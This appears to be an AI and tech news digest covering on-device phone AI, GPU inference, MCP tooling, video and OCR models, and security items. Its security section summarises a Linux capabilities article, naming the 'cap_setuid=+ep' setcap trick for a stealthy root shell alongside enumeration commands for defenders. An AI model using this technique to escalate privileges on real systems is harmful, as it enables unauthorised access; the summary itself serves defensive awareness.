Phones inch toward real local AI
Published on
iPhone-class hardware is starting to feel genuinely capable of on-device AI beyond gimmicks. A developer reports Qwen3 4B running around 25 tokens/sec on an iPhone 17 (A19 Pro) GPU via Apple’s MLX, ...
Phones inch toward real local AI
iPhone-class hardware is starting to feel genuinely capable of on-device AI beyond gimmicks. A developer reports Qwen3 4B running around 25 tokens/sec on an iPhone 17 (A19 Pro) GPU via Apple’s MLX, a significant jump over iPhone 16 Pro, with better thermals and the GPU “catching up” to Apple’s Neural Engine for local inference. The thread debates usefulness and quantization trade-offs: some argue phones remain too constrained, others point out 1–4B models feel snappy and, paired with search tools, are already practical for private, low-latency tasks. The post is from the maker of the Vector Space app (in beta), but the observations reflect a broader trend of small models becoming usable on recent iPhones. (more: https://www.reddit.com/r/LocalLLaMA/comments/1oarkn3/i_am_generally_impressed_by_iphone_17_gpu/)
Voice is joining the party. An iOS developer got Kokoro TTS running fully on-device using the full 325 MB ONNX model with real voice embeddings—no server calls—producing natural 24 kHz audio in about four seconds per sentence and supporting 50+ voices across multiple languages. They integrate espeak-ng for phonetic handling and are considering quantization to shave latency. Others note iOS apps with local Kokoro already exist, underscoring how quickly high-quality local TTS is maturing. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8m1v0/i_got_kokoro_tts_running_natively_on_ios/)
Open tooling is making local deployment easier on mobile. PrivateMind, a FOSS chat app with on-device inference and RAG, uses React Native ExecuTorch; models are exported to .pte via Optimum-ExecuTorch, and the team is exploring a hybrid fallback to cloud for heavier tasks. Meanwhile, at the hobbyist end of the spectrum, a Gemma 3 1B Q4 build tuned for Raspberry Pi runs fully offline via Ollama at ~3.67 tok/s on a Pi 4/5, with a local “MCP-style” tool registry to run scripts and read metrics—underscoring that useful agent-style workflows can exist even with very small models entirely offline. (more: https://www.reddit.com/r/LocalLLaMA/comments/1obvb5g/mobile_fully_on_device_inference_ai_chat_app_with/) (more: https://www.reddit.com/r/ollama/comments/1obxfoc/gemma_3_1b_smart_q4_bilingual_iten_offline_ai_for/)
Open computing, shrinking freedoms
The ability to run what you want on machines you own is eroding, argues a Hackaday editorial that traces a clear throughline: consoles pioneered walled gardens; the iPhone normalized them under a safety/quality banner; and Android and Windows have steadily tightened controls, often justified as security while advancing platform monetization. The result is less experimentation and a chilling effect on grassroots innovation. The piece’s call to action—vote with your wallet—will resonate as more people attempt to deploy private, on-device AI and run into locked-down ecosystems with gatekeepers in the loop. (more: https://hackaday.com/2025/10/22/what-happened-to-running-what-you-wanted-on-your-own-machine/)
Viewed through the lens of local AI, this tension is obvious: users are increasingly interested in privacy-preserving, offline models for chat, TTS, and tools, yet more platform layers sit between the developer and the hardware. That doesn’t make local AI impossible—far from it—but it raises the importance of open runtimes and formats, and of platforms that allow users to choose what runs on their silicon. (more: https://hackaday.com/2025/10/22/what-happened-to-running-what-you-wanted-on-your-own-machine/)
The practical upshot is a bifurcation: rapid progress in open, local AI tooling alongside platform policies that can constrain distribution and capabilities. The friction isn’t theoretical; it affects whether an app can ship local inference by default or must fall back to a cloud endpoint. (more: https://hackaday.com/2025/10/22/what-happened-to-running-what-you-wanted-on-your-own-machine/)
GPUs and local LLM throughput
Valve engineers quietly pushed llama.cpp performance forward on AMD by contributing a RADV Vulkan improvement that boosts prompt processing throughput by roughly 13% on Linux. Community benchmarks on a Strix Halo running gpt-oss-120b-GGUF show pp512 rising from ~521 to ~624 tokens/s moving from Mesa 25.2.4 to 25.3.0-rc1, with ROCm still leading at ~753 tokens/s; token generation (tg) rates remain close across stacks. Vulkan is narrowing the gap in prompt processing, improving the out-of-the-box experience for AMD users who don’t want to rely on ROCm. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8wuyj/valve_developer_contributes_major_improvement_to/)
Meanwhile, would-be home labbers eyeing 72B models are reminded that VRAM, not cores, is king. Thread consensus: for dense 72B, target at least 72 GB VRAM for 8-bit (near-full-quality) or ~36 GB for 4-bit with an expected 10–20% quality hit; plan extra VRAM for context windows (rule-of-thumb cited: ~1 GB per 4k tokens). Dual 24 GB GPUs can get you into 70B territory with quantization; used MI50s (32 GB) are a budget option, though power and setup complexity rise. CPU matters mainly for PCIe lanes to feed multiple GPUs; CPU offloading will kneecap tokens/sec. Also consider vLLM for serving. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8uemm/i_want_to_build_an_ai_inference_server_for_72b/)
The broader takeaway: software stack choices (Vulkan vs ROCm), quantization, and memory planning are decisive for throughput. Shaving double-digit percentages in prompt processing at the driver layer can mean the difference between “usable” and “not quite there” when serving large models interactively. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8wuyj/valve_developer_contributes_major_improvement_to/)
Agents, tools, and MCP reality checks
Tool calling remains fragmented. Developers integrating Ollama Cloud discovered that its tool call format lacks call IDs and doesn’t support parallel tool calls, which complicates mapping tool responses back to specific requests. Some models (e.g., gpt-oss-120b) may not return tool_call_id consistently, while others (e.g., Qwen3 variants) behave better; filtering for models explicitly marked as supporting Tools helps. Expect stop reasons to come back as “stop,” not “tool_calls.” (more: https://www.reddit.com/r/ollama/comments/1o93mz0/ollama_cloud_api_tool_usage/)
Model Context Protocol (MCP) support is also uneven in clients. A developer reported that Claude Desktop didn’t react to MCP server-side notifications like sendToolsListChanged() per the TypeScript SDK, with no feedback from the MCP Inspector either—raising questions about notification support vs. polling-only implementations. This is the sort of portability friction that keeps agents from being plug-and-play. (more: https://www.reddit.com/r/ClaudeAI/comments/1o9uyr2/does_claude_desktop_support_mcp_server/)
On the human-in-the-loop side, power users are noticing inconsistency in coding assistants. One account describes canceling Claude Pro for feeling “dumbed down,” finding ChatGPT Plus initially better, then also stumbling on simple SQL, while free Claude Sonnet one-shot the task. For everyday code completion and small transformations, these swings erode trust; developers want predictable behavior more than occasional brilliance. (more: https://www.reddit.com/r/ChatGPTCoding/comments/1o8cb20/chatgpt_or_claude_for_web_coding_assitant/)
Real-time long‑video understanding
StreamingVLM tackles the hard problem of understanding effectively infinite video streams with stable, real-time responses by aligning training with streaming inference and maintaining a compact KV cache. This avoids quadratic cost and the artifacts of naive sliding windows, enabling up to 8 FPS on a single H100 GPU. Impressively, it not only delivers on long-form streaming but also boosts standard VQA without task-specific finetuning. (more: https://github.com/mit-han-lab/streaming-vlm)
On a new long-video benchmark, the authors report a 66.18% win rate against GPT-4o mini, a strong signal that tailored architectures can outpace general models for specific regimes like streaming. The repo includes end-to-end scripts: preprocessing LiveCC, SFT training in two stages, and efficiency benchmarking. (more: https://github.com/mit-han-lab/streaming-vlm)
Evaluation covers both public kits and in-house suites: VLMEvalKit for VQA tasks, OVOBench for diverse video workloads, and LiveSports3K-cc for live commentary analysis. Practitioners can tweak inference FPS directly via a small code edit, making it straightforward to dial in latency/quality trade-offs for deployment targets. (more: https://github.com/mit-han-lab/streaming-vlm)
Identity‑faithful faces and fast image‑to‑video
WithAnyone aims to break the identity vs. “copy-paste” trade-off in face generation. Rather than pasting a reference face, it provides controllable, ID-consistent generation—including multiple identities in one image—while preserving flexibility over expressions, hairstyles, accessories, and poses. A key control is a slider trading “resemblance in spirit” (SigLIP embedding) vs. “resemblance in form” (ArcFace embedding), and it requires face bounding boxes to tell the model where to render faces. A Gradio demo, LoRA merging, and evaluation scripts are included; the model weights are released for non-commercial academic use under FLUX.1 dev’s license. (more: https://github.com/Doby-Xu/WithAnyone)
On the video side, Wan2.2 I2V pushes inference efficiency: a distilled, MoE-based image-to-video model that generates high-quality videos in just four steps (two high-noise + two low-noise) and without classifier-free guidance. The team emphasizes high-noise two-step training improvements for dynamics/consistency while reusing Wan2.1 LoRAs for low-noise. The lightx2v engine accelerates inference; recommended settings use the Euler scheduler with shift=5.0 and guidance_scale=1.0. The model is Apache 2.0-licensed. (more: https://huggingface.co/lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v)
The throughline across both projects is precise control—of identity fidelity in images and of temporal coherence and speed in video—signals that generative media is maturing from “can it render?” to “can it match intent fast, reliably, and safely?” (more: https://github.com/Doby-Xu/WithAnyone) (more: https://huggingface.co/lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v)
OCR becomes document AI
Open-weight VLMs have transformed OCR from “transcribe text” into “reconstruct documents.” A comprehensive guide shows modern models preserving layout, parsing tables/charts, captioning images, handling many scripts, and producing machine-readable outputs (HTML, Markdown, DocTags, JSON) suited to downstream QA and retrieval. It covers when to fine-tune, choosing formats, building evaluation sets, and deployment options from local (e.g., MLX on Apple Silicon) to managed endpoints; stacks like vLLM and SGLang can cut serving costs and latency. (more: https://huggingface.co/blog/ocr-open-models)
Reward modeling is also entering the document arena. DocReward targets structuring and stylizing outputs—teaching models to prefer document reconstructions that are both accurate and well-formed. Integrating reward feedback into generation can lift end-to-end quality in ways that raw likelihood training doesn’t capture, especially for complex multi-element documents. (more: https://arxiv.org/abs/2510.11391v1)
Put together, these advances point to OCR that operates as a full document understanding stack: robust parsing, structured outputs for databases/LLMs, and higher-level reasoning over heterogeneous page elements. (more: https://huggingface.co/blog/ocr-open-models) (more: https://arxiv.org/abs/2510.11391v1)
Security: autonomous agents and Unix privileges
An eye-catching claim from LinkedIn: an AI security agent autonomously found and patched a zero-day in Netty (CVE-2025-59419), a widely used networking library. The post says the flaw could have allowed forged emails to bypass SPF, DKIM, and DMARC, and that the agent analyzed code, produced a fix, and submitted it upstream without human-written patches. Maintainers’ cooperation is credited. The broader message is the shift from reactive to autonomous defense; given the venue, treat it as a notable data point rather than a new baseline. (more: https://www.linkedin.com/posts/mavlevin_aisecurity-zeroday-cybersecurity-activity-7386478715813330944-P9OP)
Defenders should also remember that Unix privileges have more facets than SUID/SGID bits. A deep-dive on Linux capabilities shows how setcap can grant powerful rights (e.g., cap_setuid=+ep) to binaries without setting SUID, enabling stealthy privilege escalation. The author demonstrates spawning a root shell via Python with only capabilities tweaks, and provides commands to enumerate capabilities (getcap -r), inspect process caps, and review extended attributes (getfattr). Tools like LinPEAS help hunt for misconfigurations; Elastic documents detections for setcap usage. (more: https://dfir.ch/posts/linux_capabilities/)
The juxtaposition is instructive: AI can help find and fix vulnerabilities faster, but attackers and red-teamers can also exploit under-monitored privilege features. Security programs need automation on both detection and hardening—and an audit routine that goes beyond the usual suspects. (more: https://dfir.ch/posts/linux_capabilities/) (more: https://www.linkedin.com/posts/mavlevin_aisecurity-zeroday-cybersecurity-activity-7386478715813330944-P9OP)
Infra updates: auth and filesystems
On the database side, the OpenFGA team describes rewriting their authorization system to run in pure Postgres, collapsing a multi-store architecture into a single backend. The writeup explains how and why they did it, with an eye toward simplifying operations and aligning performance with a ubiquitous relational substrate. For teams weary of managing multiple distributed stores just to authorize users, the appeal is obvious. (more: https://getrover.substack.com/p/how-we-rewrote-openfga-in-pure-postgres)
In kernel land, an “NTFS Filesystem Remake” dubbed NTFSplus has been posted to LKML. The public link currently gates access behind Anubis proof-of-work to deter scraping, but the subject signals ongoing work on NTFS support in mainline discussions. Filesystems remain the quiet backbone of self-hosted compute; improvements here ripple upward to everything from local AI datasets to scratch-space performance. (more: https://lore.kernel.org/lkml/20251020020749.5522-1-linkinjeon@kernel.org/)
Reducing operational complexity (single-store auth) and strengthening storage layers (filesystems) are the sorts of pragmatic, unglamorous wins that make it easier to run serious workloads—including AI—on your own infrastructure. (more: https://getrover.substack.com/p/how-we-rewrote-openfga-in-pure-postgres) (more: https://lore.kernel.org/lkml/20251020020749.5522-1-linkinjeon@kernel.org/)
Beyond autoregression: music and diffusion LMs
Amadeus addresses a mismatch in symbolic music generation: models often decode note attributes (pitch, duration, velocity, instrument, type) as if they were a temporal sequence, but empirically the decoding order barely matters—suggesting attributes are concurrent, not ordered. The authors propose a two-level design: autoregressive generation across notes, coupled with a bidirectional discrete diffusion decoder within each note’s attributes. With representation learning enhancements (MLSDES contrastive objective) and a Conditional Information Enhancement Module for better conditioning, Amadeus reports at least 4× speed-up over prior methods while improving quality and offering training-free fine-grained control. It supports unconditional, text-conditioned, and attribute-controlled generation. (more: https://arxiv.org/abs/2508.20665v1)
Diffusion is also making inroads in language modeling. RND1-Base-0910 is a 30.5B-parameter sparse Mixture-of-Experts diffusion language model (≈3.3B active per token) converted from a pretrained autoregressive base (Qwen3-30BA3B). Text is generated by iteratively denoising over multiple steps, enabling parallel token updates within each diffusion step—a different speed/quality trade-off than left-to-right decoding. The release notes it’s not post-trained yet (expect some repetition with greedy decoding) and suggests optimized MoE kernels (flashinfer) and sglang for faster inference. (more: https://huggingface.co/radicalnumerics/RND1-Base-0910)
Taken together, these lines of work probe a bigger question: where does autoregression remain essential, and where can bidirectional or diffusion-style decoders yield better controllability or efficiency without sacrificing coherence? The answers are becoming domain-specific—and that’s a good thing. (more: https://arxiv.org/abs/2508.20665v1) (more: https://huggingface.co/radicalnumerics/RND1-Base-0910)
Sources (21 articles)
- [Editorial] https://www.linkedin.com/posts/mavlevin_aisecurity-zeroday-cybersecurity-activity-7386478715813330944-P9OP (www.linkedin.com)
- Valve Developer Contributes Major Improvement To RADV Vulkan For Llama.cpp AI (www.reddit.com)
- I got Kokoro TTS running natively on iOS! 🎉 Natural-sounding speech synthesis entirely on-device (www.reddit.com)
- Mobile fully on device inference AI chat app with RAG support (www.reddit.com)
- I am generally impressed by iPhone 17 GPU (www.reddit.com)
- I want to build an AI inference server for 72B models...what should I do? (www.reddit.com)
- ⚡ Gemma 3 1B Smart Q4 — Bilingual (IT/EN) Offline AI for Raspberry Pi 4/5 (www.reddit.com)
- Chatgpt or Claude for web coding assitant (www.reddit.com)
- Does Claude Desktop support MCP Server Notifications? (www.reddit.com)
- mit-han-lab/streaming-vlm (github.com)
- Doby-Xu/WithAnyone (github.com)
- We rewrote OpenFGA in pure Postgres (getrover.substack.com)
- Linux Capabilities Revisited (dfir.ch)
- Ntfsplus: NTFS Filesystem Remake (lore.kernel.org)
- lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v (huggingface.co)
- radicalnumerics/RND1-Base-0910 (huggingface.co)
- What Happened To Running What You Wanted On Your Own Machine? (hackaday.com)
- Amadeus: Autoregressive Model with Bidirectional Attribute Modelling for Symbolic Music (arxiv.org)
- Supercharge your OCR Pipelines with Open Models (huggingface.co)
- Ollama Cloud API Tool usage (www.reddit.com)
- DocReward: A Document Reward Model for Structuring and Stylizing (arxiv.org)